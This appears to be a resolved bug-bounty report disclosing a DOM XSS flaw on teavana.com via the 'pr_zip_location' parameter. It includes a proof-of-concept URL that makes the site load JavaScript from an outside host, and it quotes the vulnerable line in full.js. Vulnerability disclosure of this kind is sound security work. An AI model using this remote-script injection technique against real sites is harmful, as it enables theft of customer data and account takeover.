Loading HuntDB...

DOM XSS on teavana.com via "pr_zip_location" parameter

Medium
S
Starbucks
Submitted None
Reported by fizhimchik

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Hello Starbucks team,, I've discovered DOM XSS on `teavana.com` involving `pr_zip_location` URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?pr_zip_location=//whitehat-hacker.com/xss.j? Works in all major browsers. Vulnerable code is in `full.js`: ```js var DR = Z(DS) + "/content/" + k(DQ) + "/contents.js"; ``` That allows to execute absolutely arbitrary javascript in the context on `teavana.com` domain. As described in #202011 that directly leads to theft of customer account data and account takeover, hence I set severity to Critical. Also, I have discovered a number of other XSS attacks on similar pages, involving other parameters and sinks. Should I submit them all as individual bug reports? Thanks.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Generic